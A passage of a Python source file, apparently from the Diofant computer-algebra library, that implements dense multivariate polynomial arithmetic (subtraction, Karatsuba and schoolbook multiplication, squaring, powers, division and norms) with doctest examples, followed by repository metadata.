x**2 - x + 1
"""
if not f:
return dmp_neg(g, 0, K)
if not g:
return f
df = dmp_degree_in(f, 0, 0)
dg = dmp_degree_in(g, 0, 0)
if df == dg:
return dmp_strip([a - b for a, b in zip(f, g)], 0)
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = dmp_neg(g[:k], 0, K), g[k:]
return h + [a - b for a, b in zip(f, g)]
def dmp_sub(f, g, u, K):
"""
Subtract dense polynomials in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_sub(x**2 + y, x**2*y + x)
-x**2*y + x**2 - x + y
"""
if not u:
return dup_sub(f, g, K)
df = dmp_degree_in(f, 0, u)
if df < 0:
return dmp_neg(g, u, K)
dg = dmp_degree_in(g, 0, u)
if dg < 0:
return f
v = u - 1
if df == dg:
return dmp_strip([dmp_sub(a, b, v, K) for a, b in zip(f, g)], u)
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = dmp_neg(g[:k], u, K), g[k:]
return h + [dmp_sub(a, b, v, K) for a, b in zip(f, g)]
def dmp_add_mul(f, g, h, u, K):
"""
Return ``f + g*h`` where ``f, g, h`` are in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_add_mul(x**2 + y, x, x + 2)
2*x**2 + 2*x + y
"""
return dmp_add(f, dmp_mul(g, h, u, K), u, K)
def dmp_sub_mul(f, g, h, u, K):
"""
Return ``f - g*h`` where ``f, g, h`` are in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_sub_mul(x**2 + y, x, x + 2)
-2*x + y
"""
return dmp_sub(f, dmp_mul(g, h, u, K), u, K)
def dup_mul_karatsuba(f, g, K):
"""
Multiply dense polynomials in ``K[x]`` using Karatsuba's algorithm.
References
==========
* :cite:`Hoeven02`
"""
df = dmp_degree_in(f, 0, 0)
dg = dmp_degree_in(g, 0, 0)
n = max(df, dg) + 1
n2 = n//2
fl = dmp_slice_in(f, 0, n2, 0, 0, K)
gl = dmp_slice_in(g, 0, n2, 0, 0, K)
fh = dup_rshift(dmp_slice_in(f, n2, n, 0, 0, K), n2, K)
gh = dup_rshift(dmp_slice_in(g, n2, n, 0, 0, K), n2, K)
lo = dup_mul(fl, gl, K)
hi = dup_mul(fh, gh, K)
mid = dup_mul(dup_add(fl, fh, K), dup_add(gl, gh, K), K)
mid = dup_sub(mid, dup_add(lo, hi, K), K)
return dup_add(dup_add(lo, dup_lshift(mid, n2, K), K),
dup_lshift(hi, 2*n2, K), K)
def dup_mul(f, g, K):
"""
Multiply dense polynomials in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_mul(x - 2, x + 2)
x**2 - 4
"""
if f == g:
return dup_sqr(f, K)
if not (f and g):
return []
df = dmp_degree_in(f, 0, 0)
dg = dmp_degree_in(g, 0, 0)
n = max(df, dg) + 1
if n > query('KARATSUBA_CUTOFF'):
return dup_mul_karatsuba(f, g, K)
h = []
for i in range(df + dg + 1):
coeff = K.zero
for j in range(max(0, i - dg), min(df, i) + 1):
coeff += f[j]*g[i - j]
h.append(coeff)
return dmp_strip(h, 0)
def dmp_mul(f, g, u, K):
"""
Multiply dense polynomials in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_mul(x*y + 1, x)
x**2*y + x
"""
if not u:
return dup_mul(f, g, K)
if f == g:
return dmp_sqr(f, u, K)
df = dmp_degree_in(f, 0, u)
if df < 0:
return f
dg = dmp_degree_in(g, 0, u)
if dg < 0:
return g
h, v = [], u - 1
for i in range(df + dg + 1):
coeff = dmp_zero(v)
for j in range(max(0, i - dg), min(df, i) + 1):
coeff = dmp_add(coeff, dmp_mul(f[j], g[i - j], v, K), v, K)
h.append(coeff)
return dmp_strip(h, u)
def dup_sqr(f, K):
"""
Square dense polynomials in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_sqr(x**2 + 1)
x**4 + 2*x**2 + 1
"""
df, h = len(f) - 1, []
for i in range(2*df + 1):
c = K.zero
jmin = max(0, i - df)
jmax = min(i, df)
n = jmax - jmin + 1
jmax = jmin + n // 2 - 1
for j in range(jmin, jmax + 1):
c += f[j]*f[i - j]
c += c
if n & 1:
elem = f[jmax + 1]
c += elem**2
h.append(c)
return dmp_strip(h, 0)
def dmp_sqr(f, u, K):
"""
Square dense polynomials in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_sqr(x**2 + x*y + y**2)
x**4 + 2*x**3*y + 3*x**2*y**2 + 2*x*y**3 + y**4
"""
if not u:
return dup_sqr(f, K)
df = dmp_degree_in(f, 0, u)
if df < 0:
return f
h, v = [], u - 1
for i in range(2*df + 1):
c = dmp_zero(v)
jmin = max(0, i - df)
jmax = min(i, df)
n = jmax - jmin + 1
jmax = jmin + n // 2 - 1
for j in range(jmin, jmax + 1):
c = dmp_add(c, dmp_mul(f[j], f[i - j], v, K), v, K)
c = dmp_mul_ground(c, K(2), v, K)
if n & 1:
elem = dmp_sqr(f[jmax + 1], v, K)
c = dmp_add(c, elem, v, K)
h.append(c)
return dmp_strip(h, u)
def dmp_pow(f, n, u, K):
"""
Raise ``f`` to the ``n``-th power in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_pow(x*y + 1, 3)
x**3*y**3 + 3*x**2*y**2 + 3*x*y + 1
"""
if not n:
return dmp_one(u, K)
if n < 0:
raise ValueError("can't raise polynomial to a negative power")
if n == 1 or dmp_zero_p(f, u) or dmp_one_p(f, u, K):
return f
g = dmp_one(u, K)
while True:
n, m = n//2, n
if m & 1:
g = dmp_mul(g, f, u, K)
if not n:
break
f = dmp_sqr(f, u, K)
return g
def dmp_div(f, g, u, K):
"""
Polynomial division with remainder in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_div(x**2 + x*y, 2*x + 2)
(0, x**2 + x*y)
>>> R, x, y = ring('x y', QQ)
>>> R.dmp_div(x**2 + x*y, 2*x + 2)
(1/2*x + 1/2*y - 1/2, -y + 1)
"""
ring = K.poly_ring(*[f'_{i}' for i in range(u + 1)])
f, g = map(ring.from_dense, (f, g))
return tuple(map(ring.to_dense, divmod(f, g)))
def dmp_rem(f, g, u, K):
"""
Return polynomial remainder in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_rem(x**2 + x*y, 2*x + 2)
x**2 + x*y
>>> R, x, y = ring('x y', QQ)
>>> R.dmp_rem(x**2 + x*y, 2*x + 2)
-y + 1
"""
return dmp_div(f, g, u, K)[1]
def dmp_quo(f, g, u, K):
"""
Return exact polynomial quotient in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_quo(x**2 + x*y, 2*x + 2)
0
>>> R, x, y = ring('x y', QQ)
>>> R.dmp_quo(x**2 + x*y, 2*x + 2)
1/2*x + 1/2*y - 1/2
"""
return dmp_div(f, g, u, K)[0]
def dmp_max_norm(f, u, K):
"""
Return maximum norm of a polynomial in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_max_norm(2*x*y - x - 3)
3
"""
if not u:
return max(dmp_abs(f, 0, K), default=K.zero)
v = u - 1
return max(dmp_max_norm(c, v, K) for c in f)
def dmp_l1_norm(f, u, K):
"""
Return l1 norm of a polynomial in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_l1_norm(2*x*y - x - 3)
6
"""
if not u:
return sum(dmp_abs(f, u, K), K.zero)
v = u - 1
return sum(dmp_l1_norm(c, v, K) for c in f)
def dmp_expand(polys, u, K):
"""
Multiply together several polynomials in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_expand([x**2 + y**2, x + 1])
x**3 + x**2 + x*y**2 + y**2
"""
if not polys:
return dmp_one(u, K)
f = polys[0]
for g in polys[1:]:
f = dmp_mul(f, g, u, K)
return f
| {
"repo_name": "skirpichev/omg",
"path": "diofant/polys/densearith.py",
"copies": "1",
"size": "14415",
"license": "bsd-3-clause",
"hash": -2591575587763517000,
"line_mean": 16.8624535316,
"line_max": 74,
"alpha_frac": 0.4096427333,
"autogenerated": false,
"ratio": 2.5773288038619704,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.34869715371619703,
"avg_score": null,
"num_lines": null
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.